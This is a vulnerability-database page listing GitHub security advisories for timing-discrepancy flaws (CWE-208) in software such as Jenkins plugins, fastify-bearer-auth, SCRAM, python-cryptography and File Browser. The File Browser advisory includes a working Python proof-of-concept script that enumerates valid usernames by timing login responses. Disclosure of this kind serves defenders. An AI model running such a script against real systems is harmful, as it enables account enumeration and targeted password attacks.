Common Weakness Enumeration

CWE-208

Allowed

Observable Timing Discrepancy

Abstraction: Base · Status: Incomplete

Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.

306 vulnerabilities reference this CWE, most recent first.

GHSA-2XPQ-5952-38W3

Vulnerability from github – Published: 2023-10-25 18:32 – Updated: 2023-11-02 17:06
VLAI
Summary
Jenkins MSTeams Webhook Trigger Plugin uses non-constant time webhook token comparison
Details

Jenkins MSTeams Webhook Trigger Plugin 0.1.1 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.

This could potentially allow attackers to use statistical methods to obtain a valid webhook token.

As of publication of this advisory, there is no fix.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.jenkins.plugins:teams-webhook-trigger"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46658"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208",
      "CWE-697"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-30T14:53:06Z",
    "nvd_published_at": "2023-10-25T18:17:40Z",
    "severity": "LOW"
  },
  "details": "Jenkins MSTeams Webhook Trigger Plugin 0.1.1 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid webhook token.\n\nAs of publication of this advisory, there is no fix.",
  "id": "GHSA-2xpq-5952-38w3",
  "modified": "2023-11-02T17:06:07Z",
  "published": "2023-10-25T18:32:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46658"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/teams-webhook-trigger-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2023-10-25/#SECURITY-2876"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/10/25/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Jenkins MSTeams Webhook Trigger Plugin uses non-constant time webhook token comparison "
}

GHSA-342C-VCFF-2FF2

Vulnerability from github – Published: 2022-06-02 20:53 – Updated: 2022-06-02 20:53
VLAI
Summary
Login timing attack in ezsystems/ezplatform-kernel
Details

Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter 'ibexa.security.authentication.constant_auth_time'. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ezsystems/ezplatform-kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.3.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-02T20:53:43Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter \u0027ibexa.security.authentication.constant_auth_time\u0027. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.",
  "id": "GHSA-342c-vcff-2ff2",
  "modified": "2022-06-02T20:53:43Z",
  "published": "2022-06-02T20:53:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ezsystems/ezplatform-kernel/security/advisories/GHSA-342c-vcff-2ff2"
    },
    {
      "type": "WEB",
      "url": "https://developers.ibexa.co/security-advisories/ibexa-sa-2022-006-vulnerabilities-in-page-builder-login-and-commerce"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ezsystems/ezplatform-kernel"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Login timing attack in ezsystems/ezplatform-kernel"
}

GHSA-376V-XGJX-7MFR

Vulnerability from github – Published: 2022-07-15 19:14 – Updated: 2022-07-21 15:57
VLAI
Summary
fastify-bearer-auth vulnerable to Timing Attack Vector
Details

Impact

fastify-bearer-auth does not securely use crypto.timingSafeEqual. A malicious attacker could estimate the length of one valid bearer token. According to the corresponding RFC 6750, the bearer token has only base64 valid characters, reducing the range of characters for a brute force attack.

All versions of fastify-bearer-auth are also affected.

Patches

We released:

  • v8.0.1 with a fix for the Fastify v4 line
  • v7.0.2 with a fix for the Fastify v3 line

Workarounds

There are no workarounds. Update your dependencies.

References

https://hackerone.com/reports/1633287

For more information

If you have any questions or comments about this advisory: * Open an issue in https://github.com/fastify/fastify-bearer-auth * Email us at hello@matteocollina.com

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fastify-bearer-auth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.1"
            },
            {
              "last_affected": "6.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fastify/bearer-auth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fastify/bearer-auth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "8.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-15T19:14:27Z",
    "nvd_published_at": "2022-07-14T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nfastify-bearer-auth does not securely use crypto.timingSafeEqual. A malicious attacker could estimate the length of one valid bearer token. According to the corresponding RFC 6750, the bearer token has only base64 valid characters, reducing the range of characters for a brute force attack.\n\nAll versions of fastify-bearer-auth are also affected.\n\n### Patches\n\nWe released:\n\n* v8.0.1 with a fix for the Fastify v4 line\n* v7.0.2 with a fix for the Fastify v3 line\n\n### Workarounds\n\nThere are no workarounds. Update your dependencies.\n\n### References\n\nhttps://hackerone.com/reports/1633287\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/fastify/fastify-bearer-auth](https://github.com/fastify/fastify-bearer-auth)\n* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com)\n",
  "id": "GHSA-376v-xgjx-7mfr",
  "modified": "2022-07-21T15:57:26Z",
  "published": "2022-07-15T19:14:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-bearer-auth/security/advisories/GHSA-376v-xgjx-7mfr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31142"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-bearer-auth/commit/0c468a616d7e56126dc468150f6a5a92e530b8e4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-bearer-auth/commit/39353b15409ee99474545f615ffb16180cf3b716"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-bearer-auth/commit/f921a0582dc83112039004a9b5041141b50c5b3f"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1633287"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fastify/fastify-bearer-auth"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fastify-bearer-auth vulnerable to Timing Attack Vector"
}

GHSA-37JV-V9VV-WXWV

Vulnerability from github – Published: 2026-05-22 00:31 – Updated: 2026-05-22 03:30
VLAI
Details

Catalyst::Plugin::Authentication versions through 0.10024 for Perl is susceptible to timing attacks.

These versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash or password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-21T22:16:48Z",
    "severity": null
  },
  "details": "Catalyst::Plugin::Authentication versions through 0.10024 for Perl  is susceptible to timing attacks.\n\nThese versions use Perl\u0027s built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash or password.",
  "id": "GHSA-37jv-v9vv-wxwv",
  "modified": "2026-05-22T03:30:25Z",
  "published": "2026-05-22T00:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5091"
    },
    {
      "type": "WEB",
      "url": "https://github.com/perl-catalyst/Catalyst-Plugin-Authentication/commit/b0515f492257438cf07082acf1e10d06e8088a5e.patch"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/ETHER/Catalyst-Plugin-Authentication-0.10_025/changes"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/05/21/19"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-3JG7-GHG4-5PXR

Vulnerability from github – Published: 2023-10-19 12:30 – Updated: 2024-02-16 21:31
VLAI
Details

The AES implementation in the Texas Instruments OMAP L138 (secure variants), present in mask ROM, suffers from a timing side channel which can be exploited by an adversary with non-secure supervisor privileges by managing cache contents and collecting timing information for different ciphertext inputs. Using this side channel, the SK_LOAD secure kernel routine can be used to recover the Customer Encryption Key (CEK).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-25332"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-19T10:15:09Z",
    "severity": "MODERATE"
  },
  "details": "The AES implementation in the Texas Instruments OMAP L138 (secure variants), present in mask ROM, suffers from a timing side channel which can be exploited by an adversary with non-secure supervisor privileges by managing cache contents and collecting timing information for different ciphertext inputs. Using this side channel, the SK_LOAD secure kernel routine can be used to recover the Customer Encryption Key (CEK).",
  "id": "GHSA-3jg7-ghg4-5pxr",
  "modified": "2024-02-16T21:31:31Z",
  "published": "2023-10-19T12:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25332"
    },
    {
      "type": "WEB",
      "url": "https://tetraburst.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3WFH-36RX-9537

Vulnerability from github – Published: 2025-09-16 22:20 – Updated: 2026-01-23 17:28
VLAI
Summary
Timing Attack Vulnerability in SCRAM Authentication
Details

Impact

A timing attack vulnerability exists in the SCRAM Java implementation. The issue arises because Arrays.equals was used to compare secret values such as client proofs and server signatures. Since Arrays.equals performs a short-circuit comparison, the execution time varies depending on how many leading bytes match. This behavior could allow an attacker to perform a timing side-channel attack and potentially infer sensitive authentication material. All users relying on SCRAM authentication are impacted.

Patches

This vulnerability has been patched by replacing Arrays.equals with MessageDigest.isEqual, which ensures constant-time comparison.

Users should upgrade to version 3.2 or later to mitigate this issue.

Workarounds

Because the attack requires high precision and repeated attempts, the risk is limited, but the only reliable mitigation is to upgrade to a patched release (version 3.2 or later).

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.ongres.scram:scram-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208",
      "CWE-385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-16T22:20:08Z",
    "nvd_published_at": "2025-09-22T20:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nA timing attack vulnerability exists in the SCRAM Java implementation. The issue arises because `Arrays.equals` was used to compare secret values such as client proofs and server signatures. Since `Arrays.equals` performs a short-circuit comparison, the execution time varies depending on how many leading bytes match. This behavior could allow an attacker to perform a timing side-channel attack and potentially infer sensitive authentication material. All users relying on SCRAM authentication are impacted.\n\n### Patches\n\nThis vulnerability has been patched by replacing `Arrays.equals` with `MessageDigest.isEqual`, which ensures constant-time comparison.\n\nUsers should upgrade to version **3.2** or later to mitigate this issue.\n\n### Workarounds\n\nBecause the attack requires high precision and repeated attempts, the risk is limited, but the only reliable mitigation is to upgrade to a patched release (version 3.2 or later).\n\n### References\n\n- [Java `MessageDigest.isEqual` Documentation](https://docs.oracle.com/en/java/javase/25/docs/api/java.base/java/security/MessageDigest.html#isEqual(byte[],byte[]))",
  "id": "GHSA-3wfh-36rx-9537",
  "modified": "2026-01-23T17:28:00Z",
  "published": "2025-09-16T22:20:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ongres/scram/security/advisories/GHSA-3wfh-36rx-9537"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59432"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ongres/scram/commit/e0b0cf99f05406a0d26682c72fcb5728e95124b3"
    },
    {
      "type": "WEB",
      "url": "https://docs.oracle.com/en/java/javase/25/docs/api/java.base/java/security/MessageDigest.html#isEqual(byte%5B%5D,byte%5B%5D)"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ongres/scram"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Timing Attack Vulnerability in SCRAM Authentication"
}

GHSA-3WW4-GG4F-JR7F

Vulnerability from github – Published: 2024-02-05 21:30 – Updated: 2026-02-27 20:57
VLAI
Summary
Python Cryptography package vulnerable to Bleichenbacher timing oracle attack
Details

A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cryptography"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "42.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-50782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208",
      "CWE-385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-05T23:04:50Z",
    "nvd_published_at": "2024-02-05T21:15:11Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.",
  "id": "GHSA-3ww4-gg4f-jr7f",
  "modified": "2026-02-27T20:57:35Z",
  "published": "2024-02-05T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyca/cryptography/issues/9785"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2023-50782"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyca/cryptography"
    },
    {
      "type": "WEB",
      "url": "https://www.couchbase.com/alerts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack"
}

GHSA-43FJ-QP3H-HRH5

Vulnerability from github – Published: 2026-04-15 18:57 – Updated: 2026-05-12 13:31
VLAI
Summary
Sync-in Server has Username Enumeration via Timing Attack
Details

Summary

The /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time.

Details

The logic flaw can be located at the below point in source: https://github.com/Sync-in/server/blob/7868bb2b3025f92e6c38087456304758713971b2/backend/src/applications/users/services/users-queries.service.ts#L91-L95

Endpoints used for authentication should respond to the user with a consistent cadence, preventing remote actors from deriving sensitive information about an application based on backend behavior. In the case of authentication endpoints, this timing discrepancy is often caused by short-circuiting due to the lack of a matched user to compare against - as is the case with Sync-in.

Validation

TickTock Enum (Burp Suite Extension) was utilized to validate this finding. Authentication attempts with a valid username see a response from the application at around 350-400ms on average, while invalid usernames are returned at only 95-100ms on average. image

Impact

An unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the application's security posture by facilitating targeted brute-force attacks, stuffing, social engineering, and a suite of other more targeted attacks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@sync-in/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41161"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-15T18:57:50Z",
    "nvd_published_at": "2026-05-08T14:16:33Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `/api/auth/login` endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application\u0027s response time.\n\n### Details\nThe logic flaw can be located at the below point in source:\nhttps://github.com/Sync-in/server/blob/7868bb2b3025f92e6c38087456304758713971b2/backend/src/applications/users/services/users-queries.service.ts#L91-L95\n\nEndpoints used for authentication should respond to the user with a consistent cadence, preventing remote actors from deriving sensitive information about an application based on backend behavior. In the case of authentication endpoints, this timing discrepancy is often caused by short-circuiting due to the lack of a matched user to compare against - as is the case with Sync-in.\n\n### Validation\nTickTock Enum (Burp Suite Extension) was utilized to validate this finding. Authentication attempts with a valid username see a response from the application at around 350-400ms on average, while invalid usernames are returned at only 95-100ms on average.\n\u003cimg width=\"1302\" height=\"284\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31eeb72a-c3c2-4057-ac69-c0c92f0bbd4e\" /\u003e\n\n### Impact\nAn unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the application\u0027s security posture by facilitating targeted brute-force attacks, stuffing, social engineering, and a suite of other more targeted attacks.",
  "id": "GHSA-43fj-qp3h-hrh5",
  "modified": "2026-05-12T13:31:20Z",
  "published": "2026-04-15T18:57:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41161"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Sync-in/server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Sync-in/server/releases/tag/v2.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Sync-in Server has Username Enumeration via Timing Attack"
}

GHSA-43MM-M3H2-3PRC

Vulnerability from github – Published: 2026-01-21 01:02 – Updated: 2026-01-21 01:02
VLAI
Summary
File Browser Vulnerable to Username Enumeration via Timing Attack in /api/login
Details

Summary

The JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint.

Details

The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow.

This difference in execution path creates a measurable timing discrepancy:

Invalid User: ~1ms execution (Database lookup only). Valid User: ~50ms+ execution (Database lookup + Bcrypt hashing).

In auth/json.go:

// auth/json.go line 54
u, err := usr.Get(srv.Root, cred.Username)
// VULNERABILITY:
// If 'err != nil' (User not found), the OR condition short-circuits.
// The second part (!users.CheckPwd) is NEVER executed.
//
// If 'err == nil' (User found), the code MUST execute users.CheckPwd (Bcrypt).
if err != nil || !users.CheckPwd(cred.Password, u.Password) {
    return nil, os.ErrPermission
}

PoC

The following Python script automates the attack. It first calibrates the network latency using random (non-existent) users to establish a baseline/threshold, and then tests a list of target usernames. Valid users are detected when the response time exceeds the calculated threshold.

import requests
import time
import random
import string
import statistics
import argparse

CALIBRATION_SAMPLES = 20
ENDPOINT = "/api/login"

def generate_random_user(length=10):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def measure_response_time(url, username):
    start = time.perf_counter()
    try:
        requests.post(url, json={"username": username, "password": "dummy_pass_123!"})
    except Exception as e:
        print(f"[!] Connection error: {e}")
        return 0
    return time.perf_counter() - start

def calibrate(url):
    print(f"\n[*] Calibrating with {CALIBRATION_SAMPLES} random users...")
    times = []

    print("    Progress: ", end="", flush=True)
    for _ in range(CALIBRATION_SAMPLES):
        random_user = generate_random_user()
        elapsed = measure_response_time(url, random_user)
        times.append(elapsed)
        print(".", end="", flush=True)
    print(" OK")

    mean = statistics.mean(times)
    try:
        stdev = statistics.stdev(times)
    except:
        stdev = 0.0

    threshold = mean + (5 * stdev) + 0.005

    print(f"    - Mean time (invalid users): {mean:.4f}s")
    print(f"    - Standard deviation: {stdev:.6f}s")
    print(f"    - Threshold set: {threshold:.4f}s")

    return threshold

def load_wordlist(wordlist_path):
    try:
        with open(wordlist_path, 'r', encoding='utf-8') as f:
            users = [line.strip() for line in f if line.strip()]
        return users
    except FileNotFoundError:
        print(f"[!] Wordlist not found: {wordlist_path}")
        exit(1)
    except Exception as e:
        print(f"[!] Error reading wordlist: {e}")
        exit(1)

def timing_attack(url, threshold, users):
    print(f"\n[*] Testing {len(users)} users from wordlist...")
    print("-" * 50)
    print(f"{'Username':<15} | {'Time':<10} | {'Status'}")
    print("-" * 50)

    found = []

    for user in users:
        elapsed = measure_response_time(url, user)

        if elapsed > threshold:
            status = ">> VALID <<"
            found.append(user)
        else:
            status = "invalid"

        print(f"{user:<15} | {elapsed:.4f}s | {status}")

    return found

def main():
    parser = argparse.ArgumentParser(description='FileBrowser timing attack exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://localhost:8080)')
    parser.add_argument('-w', '--wordlist', required=True, help='Path to wordlist file')
    args = parser.parse_args()

    target_url = args.url.rstrip('/') + ENDPOINT

    print("=== FILEBROWSER TIMING ATTACK ===\n")
    print(f"[*] Target: {target_url}")
    print(f"[*] Wordlist: {args.wordlist}")

    try:
        threshold = calibrate(target_url)
        users = load_wordlist(args.wordlist)
        print(f"\n[*] Loaded {len(users)} users from wordlist")
        print("[*] Starting attack...")

        valid_users = timing_attack(target_url, threshold, users)

        print("\n" + "="*50)
        print(f"SUMMARY: {len(valid_users)} valid users found")
        if valid_users:
            for u in valid_users:
                print(f"  -> {u}")
        print("="*50)

    except KeyboardInterrupt:
        print("\n[!] Attack cancelled")

if __name__ == "__main__":
    main()

For example, in this case, I have guchihacker as the only valid user in the application. image

I am going to use the exploit to list valid users. image As we can see, the user guchihacker has been confirmed as a valid user by comparing the server response time.

Impact

An unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the security posture by facilitating targeted brute-force attacks or credential stuffing against specific, known-valid accounts (e.g., 'admin', 'root', employee names).

I remain at your disposal for any questions you may have on this matter. Thank you very much.

Sincerely, Felix Sanchez (GUCHI)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.55.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23849"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T01:02:17Z",
    "nvd_published_at": "2026-01-19T21:15:51Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint.\n\n### Details\nThe vulnerability exists due to a \"short-circuit\" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow.\n\nThis difference in execution path creates a measurable timing discrepancy:\n\nInvalid User: ~1ms execution (Database lookup only).\nValid User: ~50ms+ execution (Database lookup + Bcrypt hashing).\n\nIn auth/json.go:\n```go\n// auth/json.go line 54\nu, err := usr.Get(srv.Root, cred.Username)\n// VULNERABILITY:\n// If \u0027err != nil\u0027 (User not found), the OR condition short-circuits.\n// The second part (!users.CheckPwd) is NEVER executed.\n//\n// If \u0027err == nil\u0027 (User found), the code MUST execute users.CheckPwd (Bcrypt).\nif err != nil || !users.CheckPwd(cred.Password, u.Password) {\n    return nil, os.ErrPermission\n}\n```\n### PoC\nThe following Python script automates the attack. It first calibrates the network latency using random (non-existent) users to establish a baseline/threshold, and then tests a list of target usernames. Valid users are detected when the response time exceeds the calculated threshold.\n\n```python\nimport requests\nimport time\nimport random\nimport string\nimport statistics\nimport argparse\n\nCALIBRATION_SAMPLES = 20\nENDPOINT = \"/api/login\"\n\ndef generate_random_user(length=10):\n    return \u0027\u0027.join(random.choices(string.ascii_lowercase + string.digits, k=length))\n\ndef measure_response_time(url, username):\n    start = time.perf_counter()\n    try:\n        requests.post(url, json={\"username\": username, \"password\": \"dummy_pass_123!\"})\n    except Exception as e:\n        print(f\"[!] Connection error: {e}\")\n        return 0\n    return time.perf_counter() - start\n\ndef calibrate(url):\n    print(f\"\\n[*] Calibrating with {CALIBRATION_SAMPLES} random users...\")\n    times = []\n    \n    print(\"    Progress: \", end=\"\", flush=True)\n    for _ in range(CALIBRATION_SAMPLES):\n        random_user = generate_random_user()\n        elapsed = measure_response_time(url, random_user)\n        times.append(elapsed)\n        print(\".\", end=\"\", flush=True)\n    print(\" OK\")\n    \n    mean = statistics.mean(times)\n    try:\n        stdev = statistics.stdev(times)\n    except:\n        stdev = 0.0\n    \n    threshold = mean + (5 * stdev) + 0.005\n    \n    print(f\"    - Mean time (invalid users): {mean:.4f}s\")\n    print(f\"    - Standard deviation: {stdev:.6f}s\")\n    print(f\"    - Threshold set: {threshold:.4f}s\")\n    \n    return threshold\n\ndef load_wordlist(wordlist_path):\n    try:\n        with open(wordlist_path, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n            users = [line.strip() for line in f if line.strip()]\n        return users\n    except FileNotFoundError:\n        print(f\"[!] Wordlist not found: {wordlist_path}\")\n        exit(1)\n    except Exception as e:\n        print(f\"[!] Error reading wordlist: {e}\")\n        exit(1)\n\ndef timing_attack(url, threshold, users):\n    print(f\"\\n[*] Testing {len(users)} users from wordlist...\")\n    print(\"-\" * 50)\n    print(f\"{\u0027Username\u0027:\u003c15} | {\u0027Time\u0027:\u003c10} | {\u0027Status\u0027}\")\n    print(\"-\" * 50)\n    \n    found = []\n    \n    for user in users:\n        elapsed = measure_response_time(url, user)\n        \n        if elapsed \u003e threshold:\n            status = \"\u003e\u003e VALID \u003c\u003c\"\n            found.append(user)\n        else:\n            status = \"invalid\"\n            \n        print(f\"{user:\u003c15} | {elapsed:.4f}s | {status}\")\n        \n    return found\n\ndef main():\n    parser = argparse.ArgumentParser(description=\u0027FileBrowser timing attack exploit\u0027)\n    parser.add_argument(\u0027-u\u0027, \u0027--url\u0027, required=True, help=\u0027Target URL (e.g., http://localhost:8080)\u0027)\n    parser.add_argument(\u0027-w\u0027, \u0027--wordlist\u0027, required=True, help=\u0027Path to wordlist file\u0027)\n    args = parser.parse_args()\n    \n    target_url = args.url.rstrip(\u0027/\u0027) + ENDPOINT\n    \n    print(\"=== FILEBROWSER TIMING ATTACK ===\\n\")\n    print(f\"[*] Target: {target_url}\")\n    print(f\"[*] Wordlist: {args.wordlist}\")\n    \n    try:\n        threshold = calibrate(target_url)\n        users = load_wordlist(args.wordlist)\n        print(f\"\\n[*] Loaded {len(users)} users from wordlist\")\n        print(\"[*] Starting attack...\")\n        \n        valid_users = timing_attack(target_url, 